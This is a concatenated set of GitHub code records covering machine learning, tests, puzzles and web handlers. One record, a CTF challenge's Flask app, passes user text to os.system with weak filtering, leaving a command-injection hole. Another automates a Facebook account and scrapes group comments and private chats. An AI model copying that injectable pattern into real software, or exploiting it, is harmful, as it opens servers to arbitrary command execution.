n_nbr_samples=n_nbr_samples2,\n g=g,\n dropout=dropout,\n batchnorm=True,\n )\n self.enc2 = EncodingLayer(\n features=lambda x: self.enc1(x),\n feature_dim=hidden_dim,\n emb_input_dim=hidden_dim,\n emb_dim=emb_dim,\n g=g,\n agg=self.agg2,\n base_model=self.enc1,\n depth=1,\n dropout=dropout,\n batchnorm=True,\n )\n self.model = self.enc2.apply(init_weights)\n\n def forward(self, node_list, randomize_features=False):\n if self.model.training:\n return self.model(node_list, randomize_features)\n else:\n return torch.cat(\n (\n self.enc2(node_list, False),\n self.enc1(node_list, False),\n ),\n dim=1,\n )\n\n\ndef sigmoid_loss(emb_u, emb_v, emb_neg, pos_weight):\n logsigmoid = nn.LogSigmoid()\n emb_v = emb_v.view(emb_u.size()[0], -1, emb_u.size()[1])\n emb_neg = emb_neg.view(emb_u.size()[0], -1, emb_u.size()[1])\n pos = logsigmoid((emb_u.unsqueeze(1) * emb_v).sum(dim=2)).mean()\n neg = logsigmoid(-(emb_u.unsqueeze(1) * emb_neg).sum(dim=2)).mean()\n return - (pos + neg)\n\n\ndef init_weights(m):\n if type(m) == nn.Linear:\n torch.nn.init.xavier_uniform_(m.weight)\n\n\n\ndef pad_features(features, feature_max_len):\n while len(features) < feature_max_len:\n features.append(0)\n if len(features) > feature_max_len:\n features = np.random.choice(\n features,\n size=feature_max_len,\n )\n return features\n","repo_name":"georgeberry/role-action-embeddings","sub_path":"small_graphs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"9811772843","text":"# This file creates demo devices that simulate data\n# broadcast via PyJapc. It uses PAPC - a PyJapc\n# Python simulation replacement. At runtime, PyJapc will\n# be substituted with this interface and the data will\n# be coming not from a real control system but devices\n# created in this file. 
Hence, you can run the example\n# outside of TN with deterministic data.\n\nfrom papc.device import Device\nfrom papc.system import System\nfrom papc.deviceproperty import Acquisition\nfrom papc.fieldtype import FieldType\nfrom papc.simulator.trig import RepeatedTimer\nimport random\n\n\nclass DemoDevice(Device):\n    \"\"\"\n    Demo device produces two fields with random integers in range (0, 100).\n    \"\"\"\n    frequency = 1\n\n    def __init__(self):\n        super().__init__(name='DemoDevice', device_properties=(\n            Acquisition(name='Acquisition', fields=(\n                FieldType(name='ChannelA', datatype='int', initial_value=0),\n                FieldType(name='ChannelB', datatype='int', initial_value=0),\n            )),\n        ))\n        self._is_tick = True\n        self._timer = RepeatedTimer(1 / self.frequency, self.time_tick)\n\n    def time_tick(self):\n        \"\"\"Callback on timer fire.\"\"\"\n        self.set_state(new_values={\n            'Acquisition#ChannelA': random.randint(0, 100),\n            'Acquisition#ChannelB': random.randint(0, 100),\n        }, timing_selector='')\n\n\ndef create_device():\n    \"\"\"Entrypoint for the example to start simulating data flow.\"\"\"\n    d = DemoDevice()\n    d.time_tick() # Trigger the first/initial tick (gives us nicer values).\n    return System(devices=[d])\n","repo_name":"jfpatrick/accsoft-gui-rad-comrad","sub_path":"_comrad_examples/g2_advanced/e6_value_aggregator/japc_device.py","file_name":"japc_device.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33774335881","text":"def time_to_int(str_time):\n    return (int(str_time.split(\":\")[0]) * 60) + int(str_time.split(\":\")[1])\n\n\ndef solution(n, t, m, timetable):\n    answer = ''\n    start_time = 540\n    timetable = sorted(list(map(time_to_int, timetable)))\n    on_bus_lists = [[] for _ in range(n)]\n\n    for shuttle in range(n):\n        for man in range(m): # up to m passengers can board each shuttle\n            if len(timetable) > 0:\n                if timetable[0] <= start_time + (shuttle * t):\n                    on_bus_lists[shuttle].append(timetable.pop(0))\n            else: # no more passengers are coming\n                break\n\n    on_bus_list = on_bus_lists[-1]\n    if len(on_bus_list) >= m:\n        answer = list(set(on_bus_list))[-1] - 1\n    else:\n        answer = start_time + (t * (n - 1))\n\n    print(on_bus_lists)\n    return \"{:02d}:{:02d}\".format(answer // 60, answer % 60)\n\n\ntest_case = [\n    2, 10, 2, [\"09:10\", \"09:09\", \"08:00\"], \"09:09\"\n]\n\nres = solution(test_case[0], test_case[1], test_case[2], test_case[3])\nprint(res)\nif res == test_case[-1]:\n    print(\"goood\")\nelse:\n    print(\"fail \")\n","repo_name":"bearics/coding-test","sub_path":"pro-17678.py","file_name":"pro-17678.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1567802478","text":"import os\n\nfrom sqlalchemy import create_engine, text\n\nWELLS_URL = os.getenv('WELLS_URL')\n\ndef query_db(min_depth, min_gradient):\n    \"\"\"Returns wells that fit the search criteria.\"\"\"\n\n    engine = create_engine(WELLS_URL)\n    \n    query = text(\n        \"\"\"SELECT latitude, longitude, depth, gradient\n        FROM wells\n        WHERE depth > :min_depth AND gradient > :min_gradient\n        \"\"\"\n    )\n    with engine.connect() as conn:\n        results = (\n            conn\n            .execute(query, {'min_depth': min_depth, 'min_gradient': min_gradient})\n            .fetchall()\n        )\n\n    return results\n\nif __name__ == '__main__':\n    import sys\n\n    min_depth = float(sys.argv[1])\n    min_gradient = float(sys.argv[2])\n\n    print(query_db(min_depth, 
min_gradient))\n\n","repo_name":"craw-daddy/wells-202306","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19656449321","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom .utils import getStringBetween\n\nimport time\nimport random\n\n\n\nclass Account:\n\n\tdef __init__(self, CHROMEDRIVER_PATH=None, headless=True):\n\t\toptions = Options()\n\t\toptions.headless = headless\n\t\tself.browser = webdriver.Chrome(CHROMEDRIVER_PATH, chrome_options=options)\n\t\tself.authenticated = False\n\t\tself.id = None\n\t\tself.email = None\n\t\tself.password = None\n\n\n\t\n\tdef authenticate(self, email, password):\n\t\t\"\"\"authenticate and store the account id\"\"\"\n\t\ttry:\n\t\t\tself.browser.get(\"https://m.facebook.com\")\n\t\t\tself.browser.find_element_by_name(\"email\").send_keys(email)\n\t\t\tself.browser.find_element_by_name(\"pass\").send_keys(password + Keys.RETURN)\n\n\t\t\tif \"https://m.facebook.com\" == self.browser.current_url:\n\t\t\t\traise Exception(\"wrong email or password\")\n\t\t\tself.email = email\n\t\t\tself.password = password\n\t\t\tself.authenticated = True\n\t\t\ttime.sleep(5)\n\t\t\ttry:\t\t\n\t\t\t\tself.browser.get(\"https://m.facebook.com/profile.php\")\n\t\t\t\telem = self.browser.find_element_by_css_selector('a[href*=\"/allactivity\"]')\n\t\t\t\tself.id = elem.get_attribute(\"href\").split(\"/\")[-2]\n\t\t\texcept:\n\t\t\t\traise Exception(\"cannot get account id\")\n\t\texcept Exception as e:\n\t\t\tprint(f\"Authentication Failed: {e}\")\n\t\t\tself.exit()\n\n\n\tdef post_profile(self, text):\n\t\t\"\"\"make a profile post and return its id\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\t\t\tself.browser.get(\"https://m.facebook.com/\")\n\t\t\ttime.sleep(2)\n\t\t\tself.browser.find_element_by_xpath('//div[@role=\"textbox\"]').click()\n\t\t\ttextbox = WebDriverWait(self.browser, 10).until(lambda browser: browser.find_element_by_tag_name('textarea'))\n\t\t\ttime.sleep(3)\n\t\t\ttextbox = self.browser.find_element_by_tag_name('textarea')\n\t\t\ttextbox.send_keys(text)\n\t\t\ttime.sleep(3)\n\t\t\ttextbox.submit()\n\n\t\t\ttime.sleep(5)\n\t\n\t\t\tposts = self.browser.find_elements_by_css_selector('article')\n\t\t\tif len(posts) == 0:\n\t\t\t\traise Exception\n\t\t\tfor post in posts:\n\t\t\t\ttoParse = post.get_attribute(\"data-store\")\n\n\t\t\t\t# data-store format:{\"linkdata\":\"top_level_post_id.326230754879551:content_owner_id_new.100031212201704:story_location.6\",\"feedback_target\":326230754879551,\"feedback_source\":0,\"action_source\":0,\"actor_id\":100031212201704}\n\t\t\t\t# what we want: 326230754879551 and 100031212201704\n\n\t\t\t\tpostID = getStringBetween(toParse, \"top_level_post_id.\", \":content_owner_id_new\")\n\t\t\t\tuserID = getStringBetween(toParse, \":content_owner_id_new.\", \":story_location\")\n\t\t\t\t\t\n\t\t\t\tif userID == self.id:\n\t\t\t\t\treturn postID \n\n\t\t\traise Exception(\"cannot find post id\")\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Profile Post Failed: {e}\")\n\n\t\n\tdef post_group(self, group_id, text):\n\t\t\"\"\"make a post in a group and return the post id\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not 
authenticated\"))\n\t\t\tself.browser.get(f\"https://m.facebook.com/groups/{group_id}\")\n\t\t\tself.browser.find_element_by_xpath('//div[@role=\"textbox\"]').click()\t \n\t\t\ttextbox = self.browser.find_element_by_tag_name('textarea')\n\t\t\ttextbox.send_keys(text)\n\n\t\t\ttime.sleep(10)\n\n\t\t\tself.browser.find_element_by_css_selector('button[data-sigil=\"touchable submit_composer\"]').click()\n\n\t\t\ttime.sleep(5)\n\t\t\t\n\t\t\tposts = self.browser.find_elements_by_css_selector('article')\n\t\t\tif len(posts) == 0:\n\t\t\t\traise Exception(\"could not find any posts\")\n\n\t\t\tfor post in posts:\n\t\t\t\ttoParse = post.get_attribute(\"data-store\")\n\n\t\t\t\t# data-store format:{\"linkdata\":\"top_level_post_id.326230754879551:content_owner_id_new.100031212201704:story_location.6\",\"feedback_target\":326230754879551,\"feedback_source\":0,\"action_source\":0,\"actor_id\":100031212201704}\n\t\t\t\t# what we want: 326230754879551 and 100031212201704\n\n\t\t\t\tpostID = getStringBetween(toParse, \"top_level_post_id.\", \":content_owner_id_new\")\n\t\t\t\tuserID = getStringBetween(toParse, \":content_owner_id_new.\", \":story_location\")\n\t\t\t\t\t\n\t\t\t\tif userID == self.id:\n\t\t\t\t\treturn postID \n\n\t\t\traise Exception(\"cannot find post id\")\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Group Post Failed: {e}\")\n\n\t\n\tdef accept_all_friends(self):\n\t\t\"\"\"accept all friend requests\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\n\t\t\twhile True:\n\t\t\t\tself.browser.get(\"https://m.facebook.com/friends/center/requests/\")\n\t\t\t\trequests = self.browser.find_elements_by_css_selector('button[value=\"Confirm\"][type=\"submit\"]')\n\t\t\t\t\n\t\t\t\tif len(requests) == 0:\n\t\t\t\t\tbreak\t\t\t\t\n\n\t\t\t\ttry:\n\t\t\t\t\tfor request in requests:\n\t\t\t\t\t\t\twaitingTime = random.uniform(0.5, 1)\t\t\n\t\t\t\t\t\t\ttime.sleep(waitingTime)\n\t\t\t\t\t\t\trequest.click()\n\n\t\t\t\texcept Exception:\t\t\t\t\n\t\t\t\t\tpass\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Accepting Friend requests failed: {e}\")\n\n\t\n\tdef get_post_IDs_from_group(self, group_id, depth=0):\n\t\t\"\"\"returns a list of the first post ids on a group\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise Exception(\"not authenticated\")\n\t\t\t\n\t\t\tself.browser.get(f\"https://m.facebook.com/groups/{group_id}\")\n\t\t\ttime.sleep(1)\n\t\t\told_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n\t\t\tcur = 0\n\n\t\t\twhile cur < depth:\n\t\t\t\tself.browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\t\ttime.sleep(6)\n\t\t\t\tnew_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n\t\t\t\tif new_height == old_height:\n\t\t\t\t\tbreak\n\t\t\t\told_height = new_height\n\t\t\t\tcur += 1\n\n\t\t\tposts = self.browser.find_elements_by_css_selector('article[data-dedupekey]')\n\n\t\t\tIDs = []\n\n\t\t\tfor post in posts:\n\n\t\t\t\tdata = post.get_attribute(\"data-store\")\n\t\t\t\t#data-store=\"{\"linkdata\":\"qid.6637150604128350091:mf_story_key.554359628364431:top_level_post_id.554359628364431:tl_objid.554359628364431:content_owner_id_new.100015062925511:text_formatting.518948401838663:src.22:story_location.6\",\"feedback_target\":554359628364431,\"feedback_source\":2,\"action_source\":0,\"actor_id\":100031212201704}\"\n\t\t\t\t#what we want: 554359628364431\n\t\t\t\tpostID = getStringBetween(data, \"story_key.\", 
\":top_level\")\n\t\t\t\tIDs.append(postID)\n\t\t\tprint(f\"extracted {len(IDs)} posts from group {group_id}\")\n\t\t\treturn IDs\n\t\texcept Exception as e:\n\t\t\tprint(f\"Getting IDs from group {group_id} failed: {e}\")\t\t\t\n\n\t\n\tdef get_comments_from_profile_post(self, post_id):\n\t\t\"\"\"returns a list of comments on a group post\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\t\t\tself.browser.get(f\"https://m.facebook.com/{post_id}\")\n\t\t\tcomments = self.browser.find_elements_by_css_selector('div[data-commentid]')\n\t\t\t\n\t\t\textracted = []\t\n\n\t\t\tfor comment in comments:\n\t\t\t\textracted.append(comment.text)\t\t\n\t\t\t\t\t\t\t\n\t\t\tprint(f\"{len(extracted)} comments extracted from profile post: {post_id}\")\n\t\n\t\t\treturn extracted\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"extracting comments failed: {e}\")\n\n\n\tdef get_comments_from_group_post(self, group_id, post_id):\n\t\t\"\"\"returns a list of comments on a group post\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception)\n\t\t\tself.browser.get(f\"https://m.facebook.com/groups/{group_id}/permalink/{post_id}\" )\n\n\t\t\twaited = False\n\t\t\twhile True:\n\t\t\t\t#\n\t\t\t\tpreviousComments = self.browser.find_elements_by_css_selector('a[data-sigil=\"ajaxify\"]')\n\t\t\t\tif len(previousComments) == 0:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tpreviousComments[0].click()\n\t\t\t\t\t\twaited = False\n\t\t\t\t\t\ttime.sleep(1.5)\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tif waited:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttime.sleep(1.5)\n\t\t\t\t\t\t\twaited = True\t\t\n\n\t\t\t#
 all previous comments are loaded at this point; collect the comment elements
\n\t\t\tcomments = self.browser.find_elements_by_css_selector('div[data-commentid]')\n\t\t\textracted = []\t\n\n\t\t\tfor comment in comments:\n\t\t\t\textracted.append(comment.text)\t\t\t\t\t\t\n\t\t\tprint(f\"{len(extracted)} comments extracted from group post:{post_id}\")\n\t\t\treturn extracted\t\t\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Extracting comments from group post failed: {e}\")\n\n\n\tdef get_groups(self):\n\t\t\"\"\" returns a list of groups that the user is currently in \"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\t\t\tself.browser.get(\"https://m.facebook.com/groups/?category=groups\")\n\t\t\tgroups = self.browser.find_elements_by_css_selector('a[href*=\"/groups/\"][aria-labelledby]')\n\n\t\t\textracted = []\n\t\t\tfor group in groups:\n\t\t\t\tuid = group.get_attribute(\"href\").split(\"/\")[4].split(\"?\")[0]\n\t\t\t\textracted.append(uid)\n\t\t\tprint(f\"{len(extracted)} groups are found\")\n\t\t\treturn extracted\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Getting groups failed: {e}\")\n\n\t\n\tdef get_most_recent_conversations(self, depth=0):\n\t\t\"\"\" returns a list of IDs of the nth users that the account had converstations with \"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\t\traise Exception(\"not authenticated\")\n\t\t\tself.browser.get(\"https://m.facebook.com/messages/\")\n\t\t\tcur = 0\n\t\t\tconversations = []\t\n\n\t\t\twhile cur < depth:\n\t\t\t\ttry:\n\t\t\t\t\tsee_more = self.browser.find_element_by_css_selector('div[id=\"see_older_threads\"] > a')\n\t\t\t\t\tsee_more.click()\n\t\t\t\t\tcur += 1\n\t\t\t\t\ttime.sleep(3)\n\t\t\t\texcept:\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\t\n\t\t\t#id=\"threadlist_row_other_user_fbid_100002156320758\"\n\t\t\tconversations = self.browser.find_elements_by_css_selector('div[id*=\"threadlist_row_other_user_fbid\"]')\n\n\t\t\t\n\t\t\tinfos = []\t\n\t\t\tfor convo in conversations:\n\t\t\t\thref = convo.get_attribute(\"id\")\n\t\t\t\textracted = href.split(\"_\")[-1]\n\t\t\t\tinfos.append(extracted)\t\t\t\n\n\t\t\treturn infos\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Getting convos failed: {e}\")\n\n\t\n\tdef get_chatlog(self, user_id, depth=0):\n\t\t\"\"\"returns a list of dictionaries that has data of the last messages the account had\n\t\twith the user with user_id\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise Exception(\"not authenticated\")\n\t\t\tself.browser.get(f\"https://m.facebook.com/messages/read/?tid={user_id}\")\t\n\t\t\ttime.sleep(5)\n\t\t\tcur_page = 0\t\t\n\t\t\twhile cur_page < depth:\n\t\t\t\ttry:\n\t\t\t\t\tbutton = self.browser.find_element_by_css_selector('div[id=\"see_older\"] > a')\n\t\t\t\t\tbutton.click()\n\t\t\t\t\ttime.sleep(3)\n\t\t\t\t\tcur_page += 1\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"all convos have loaded\")\n\t\t\t\t\tbreak\n\t\t\t\n\n\t\t\t#
0)\n\n def test_image_video_kohonen(self):\n temp = get_temp_folder(__file__, \"temp_graph_distance\")\n\n graph1 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"d\"),\n (\"d\", \"e\"),\n (\"e\", \"f\"),\n (\"b\", \"f\"),\n (\"b\", \"g\"),\n (\"f\", \"g\"),\n (\"a\", \"g\"),\n (\"a\", \"g\"),\n (\"c\", \"d\"),\n (\"d\", \"g\"),\n (\"d\", \"h\"),\n (\"aa\", \"h\"),\n (\"aa\", \"c\"),\n (\"f\", \"h\"),\n ]\n graph2 = copy.deepcopy(graph1) + [\n (\"h\", \"m\"),\n (\"m\", \"l\"),\n (\"l\", \"C\"),\n (\"C\", \"r\"),\n (\"a\", \"k\"),\n (\"k\", \"l\"),\n (\"k\", \"C\"),\n ]\n\n graph1 = GraphDistance(graph1)\n graph2 = GraphDistance(graph2)\n\n graph2[\"C\"].label = \"c\"\n store = {}\n if len(list(graph1.enumerate_all_paths(True))) != 17:\n raise AssertionError(\"expecting 17 here\")\n if len(list(graph2.enumerate_all_paths(True))) != 19:\n raise AssertionError(\"expecting 19 here\")\n\n distance, graph = graph1.distance_matching_graphs_paths(\n graph2, use_min=False, store=store\n )\n\n if graph[\"h\"].Label != \"h\":\n raise AssertionError(\"we expect this node to be merged in the process\")\n\n if distance is None:\n raise AssertionError(\"expecting something different from None\")\n\n outfile1 = os.path.join(temp, \"unittest_GraphDistance4_sub1.png\")\n outfile2 = os.path.join(temp, \"unittest_GraphDistance4_sub2.png\")\n outfilef = os.path.join(temp, \"unittest_GraphDistance4_subf.png\")\n\n vertices, edges = graph1.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n try:\n draw_graph_graphviz(vertices, edges, outfile1)\n except FileNotFoundError as e:\n if \"No such file or directory: 'dot'\" in str(e):\n return\n raise e\n\n vertices, edges = graph2.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n draw_graph_graphviz(vertices, edges, outfile2)\n self.assertTrue(os.path.exists(outfile2))\n\n vertices, edges = graph.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n draw_graph_graphviz(vertices, edges, outfilef)\n self.assertTrue(os.path.exists(outfilef))\n\n def test_unittest_GraphDistance2(self):\n graph1 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"X\"),\n (\"X\", \"c\"),\n (\"c\", \"d\"),\n (\"d\", \"e\"),\n (\"0\", \"b\"),\n ]\n graph2 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"X\"),\n (\"X\", \"c\"),\n (\"c\", \"t\"),\n (\"t\", \"d\"),\n (\"d\", \"e\"),\n (\"d\", \"g\"),\n ]\n graph1 = GraphDistance(graph1)\n graph2 = GraphDistance(graph2)\n store = {}\n res, out, err = self.capture(\n lambda: graph1.distance_matching_graphs_paths(\n graph2, use_min=False, store=store, verbose=True\n )\n )\n self.assertIn(\"[distance_matching_graphs_paths]\", out)\n self.assertIn(\"#\", err)\n distance, graph = res\n if distance is None:\n raise TypeError(\"expecting something different from None\")\n allPaths = list(graph.enumerate_all_paths(True))\n if len(allPaths) == 0:\n raise ValueError(\"the number of paths should not be null\")\n if distance == 0:\n raise ValueError(\"expecting a distance > 0\")\n vertices, edges = graph.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n # GV.drawGraphEdgesVertices (vertices,edges, \"unittest_GraphDistance2.png\")\n node = graph.vertices[\"X\"]\n if None in node.pair:\n raise RuntimeError(\"unexpected, this node should be part of the common set\")\n\n vertices, edges = graph1.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n # GV.drawGraphEdgesVertices (vertices,edges, 
\"unittest_GraphDistance2_sub1.png\")\n vertices, edges = graph2.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n # GV.drawGraphEdgesVertices (vertices,edges, \"unittest_GraphDistance2_sub2.png\")\n\n def test_unittest_common_paths(self):\n graph1 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"X\"),\n (\"X\", \"c\"),\n (\"c\", \"d\"),\n (\"d\", \"e\"),\n (\"0\", \"b\"),\n ]\n graph2 = graph1\n graph1 = GraphDistance(graph1)\n graph2 = GraphDistance(graph2)\n common12 = graph1.common_paths(graph2)\n common21 = graph2.common_paths(graph1)\n s1 = str(common12)\n s2 = repr(common12)\n self.assertIn(\"c-c -> d-d []\", s1)\n self.assertIn(\"[Edge('0-0', 'b-b', '', 1.0)\", s2)\n self.assertIn(\"{'0-0': Vertex('0-0', '0', 1.0)\", s2)\n self.assertEqual(len(graph1.vertices), len(common12.vertices))\n self.assertEqual(len(graph1.vertices), len(common21.vertices))\n self.assertEqual(len(graph1.edges), len(common21.edges))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"sdpython/mlstatpy","sub_path":"_unittests/ut_graph/test_graph_distance.py","file_name":"test_graph_distance.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"10452848344","text":"class Solution:\n def maximumCostSubstring(self, s: str, chars: str, vals: List[int]) -> int:\n \n# Kadane's Algorithm Implementation \n \n d1={chr(i+96):i for i in range(1,27)}\n \n curr,curr_max=0,0\n \n for i in range(len(chars)):\n \n d1[chars[i]]=vals[i]\n \n for i in s:\n \n curr=max(0,curr+d1[i])\n \n curr_max=max(curr_max,curr)\n \n return curr_max","repo_name":"priyamshukla-coder/IMP-DSA-Questions-Solutions","sub_path":"Find Substring With Maximum Cost.py","file_name":"Find Substring With Maximum Cost.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"44333933759","text":"# -*- coding: utf-8 -*-\n\nfrom traceback import format_exc\nfrom utils import BetterDict\nfrom aiohttp import web\nimport json\n\n\nclass Socket:\n def __init__(self, sock, id):\n self.sock = sock\n self.id = id\n\n async def send(self, event_type, **kwargs):\n kwargs.update({'type': event_type})\n await self.sock.send_json(kwargs)\n\n\nclass WSHandler(web.View):\n async def get(self):\n sock = web.WebSocketResponse(heartbeat=2.0)\n await sock.prepare(self.request)\n app = self.request.app\n\n socket = Socket(sock, self.request.data['auth']['subset']['vk_user_id'])\n is_manager_connected = True if app.manager else False\n\n try:\n if self.request.data.role == 'manager':\n if not app.manager:\n app.manager = socket\n await socket.send('connected', slaves=len(app.sockets))\n await self.broadcast('manager_connected')\n else:\n await sock.close(message=b'taken')\n else:\n app.sockets.update({socket.id: socket})\n await socket.send('connected', hasManager=is_manager_connected, playing=app.playing)\n\n if app.manager:\n await app.manager.send('update_slaves', slaves=len(app.sockets))\n\n async for event in sock:\n try:\n event = BetterDict(json.loads(event.data))\n if self.request.data.role == 'manager':\n if event.type == 'play':\n app.playing = True\n elif event.type == 'stop':\n app.playing = False\n await self.broadcast(event.type)\n except:\n await socket.send('error', code=500)\n print(format_exc())\n\n finally:\n if socket.id in app.sockets:\n app.sockets.pop(socket.id)\n if self.request.data.role == 'manager' and not is_manager_connected:\n 
await self.broadcast('manager_disconnected')\n app.manager = None\n else:\n if app.manager:\n await app.manager.send('update_slaves', slaves=len(app.sockets))\n await sock.close()\n\n return sock\n\n async def broadcast(self, event_type, **kwargs):\n for id, socket in self.request.app.sockets.items():\n await socket.send(event_type, **kwargs)\n","repo_name":"Mkolba/vezdekod-final","sub_path":"vkma-task-4/api/api/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5307687956","text":"from flask import Flask, request, redirect, url_for\nimport os\nimport random\nimport string\nimport time \n\nclean = time.time()\napp = Flask(__name__)\nchars = list(string.ascii_letters + string.digits)\n\n@app.route('/')\ndef main():\n return open(\"index.html\").read()\n\n@app.route('/generate', methods=['POST'])\ndef upload():\n global clean\n if time.time() - clean > 60:\n os.system(\"rm static/images/*\")\n clean = time.time()\n data = request.form.getlist('text')[0]\n data = data.replace(\"\\\"\", \"\")\n data = data.replace(\"$\",\"\")\n name = \"\".join(random.choices(chars,k=8)) + \".png\"\n os.system(f\"python3 gene.py {name} \\\"{data}\\\"\")\n return redirect(url_for('static', filename='images/' + name), code=301)\n \nif __name__ == \"__main__\":\n app.run(\"0.0.0.0\",80)\n","repo_name":"xf1les/2021JNUCTF","sub_path":"WEB/PictureGenerator/build/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"31005529728","text":"from math import sqrt\n\n\nclass CosineSimilarity(object):\n \"\"\"\n Cosine similarity implementation for text summarization.\n \"\"\"\n\n @staticmethod\n def get_cosine_similarity(tf_idf_a, tf_idf_b):\n dot_product = CosineSimilarity.get_dot_product(tf_idf_a, tf_idf_b)\n magnitude_a = CosineSimilarity.get_magnitude(tf_idf_a)\n magnitude_b = CosineSimilarity.get_magnitude(tf_idf_b)\n\n return dot_product / (magnitude_a * magnitude_b)\n\n @staticmethod\n def get_magnitude(tf_idf):\n magnitude = 0.0\n\n for word in tf_idf:\n magnitude += pow(tf_idf[word], 2)\n\n return sqrt(magnitude)\n\n @staticmethod\n def get_dot_product(tf_idf_a, tf_idf_b):\n dot_product = 0.0\n\n for word in tf_idf_a:\n dot_product += tf_idf_a[word] * tf_idf_b[word]\n\n return dot_product\n","repo_name":"franfj/Summarizer","sub_path":"summarizer/src/algo/tools/cosine_similarity.py","file_name":"cosine_similarity.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"40949260086","text":"class A:\r\n def method1(self):\r\n print(\"Class A and MethodA\")\r\n\r\n\r\nclass B:\r\n def method1(self):\r\n print(\"Class B and MethodB\")\r\n\r\n\r\nclass C(B, A):\r\n # def method1(self):\r\n print(\"Class C and MethodC\")\r\n\r\n\r\nObj = C()\r\n# obj.methodC\r\nObj.method1()\r\n\r\n\r\n# yield keyword will have ability to convert any function to Generator and returns the object values'\r\ndef fun(n):\r\n a, b = 0, 1\r\n for j in range(0, n):\r\n a, b = b, a + b\r\n # print(\"after assignment:: \",a,b)\r\n # a=b\r\n # b=a+b\r\n yield a\r\n\r\n\r\nfor i in fun(5):\r\n print(i)\r\n\r\n\r\n# global variable\r\ndef a():\r\n # b = 10\r\n global b\r\n b = 1\r\n\r\n\r\ndef b1():\r\n a()\r\n print(\"Value\", b)\r\n\r\n\r\n# try except else finally\r\ndef 
divide(x,y):\r\n\r\n    try:\r\n        r = x / y\r\n    except Exception as e:\r\n        print(\"Sorry, you are dividing by zero: \", e)\r\n    else:\r\n        print(\"else\", x / 5)\r\n    finally:\r\n        print(\"finally\")\r\ndivide(3, 2)\r\ndivide(3, 0)\r\n\r\n# for k,v in dict.items():\r\n#     print(k,v)\r\n\r\nst = \"raja reddy@ v!\"\r\nalphanumeric = \"\"\r\ncnt = \"\"\r\nfor char in st:\r\n    if char.isalnum():\r\n        alphanumeric += char\r\n    else:\r\n        cnt += char\r\n\r\nprint(alphanumeric)\r\nprint(\"special char and space:: \", cnt)\r\n","repo_name":"raja08blr/PythonExamples","sub_path":"MutlipleInheritance.py","file_name":"MutlipleInheritance.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26976439757","text":"\nimport random\n\nHIT_CHAR = 'x'\nMISS_CHAR = 'o'\nBLANK_CHAR = 